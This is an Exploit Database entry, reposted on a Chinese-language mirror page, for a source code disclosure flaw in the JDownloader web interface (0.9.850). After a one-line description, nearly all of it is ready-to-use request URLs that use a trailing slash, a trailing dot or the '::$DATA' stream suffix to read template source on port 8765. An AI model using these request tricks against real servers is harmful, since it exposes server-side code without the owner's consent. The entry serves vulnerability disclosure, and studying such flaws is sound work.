JDownloader Webinterface – Source Code Disclosure

Exploit Database
11 阅读

作者： Sil3nt_Dre4m

日期： 2010-11-25
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/15611/

# Exploit Title: JDownloader Webinterface Source Code Disclosure
# Date: 11/24/10
# Author: Sil3nt_Dre4m
# Software Link: http://jdownloader.org
# Version: Latest (0.9.850)
# Tested on: Windows, Linux

JDownloader WebInterface is vulnerable to a source code disclosure exploit to due not properly sanitizing user input.

Linux:

http://127.0.0.1:8765/index.tmpl/

Windows:

http://127.0.0.1:8765/index.tmpl.
http://127.0.0.1:8765/index.tmpl::$DATA
http://127.0.0.1:8765/index.tmpl/

last Exploits
JDownloader Webinterface – Source Code Disclosure的更多信息

WordPress Theme DesignFolio Plus 1.2 – Arbitrary File Upload：
Job Portal Platform 1.0 – SQL Injection：
iTech Freelancer Script 5.27 – SQL Injection：
MC Buy and Sell Cars Script 1.1 – SQL Injection：
Consona – ‘n6plugindestructor.asp’ Cross-Site Scripting：
CMS Auditor Website 1.0 – SQL Injection：
Muviko 1.1 – SQL Injection：
Netlify CMS 2.10.192 – Stored Cross-Site Scripting (XSS)：